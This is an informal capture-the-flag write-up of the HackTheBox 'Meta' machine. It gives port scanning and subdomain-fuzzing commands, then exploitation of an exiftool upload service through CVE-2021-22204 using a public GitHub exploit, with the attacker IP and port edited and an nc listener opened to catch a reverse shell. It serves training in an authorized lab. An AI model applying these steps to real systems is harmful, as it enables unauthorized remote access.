CTF Meta

hosts

/etc/hosts
10.10.11.140 artcorp.htb

rustscan

rustscan -a meta.htb  --range 1-65000

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

wfuzz

Nothing with the dir listing
But with the sub listing I have this:
https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains.lst -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 9000 |grep 200

dev01.artcorp.htb.
I add it to my /etc/hosts.

It’s an exif tool, to see the metadatas.

Exploit exiftool

https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
I found this website who can give cool infos.
CVE-2021-22204
https://github.com/convisolabs/CVE-2021-22204-exiftool

Install exiftool

https://exiftool.org/install.html

Install djvulibre

sudo pacman -S djvulibre

Download

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git

Edit the file

ip = ‘10.10.15.22’
port = ‘4444’

Open the listener

nc -nlvp 4444

BOOMMMM

I upload the file and the shell pop.

I need to go to sleep…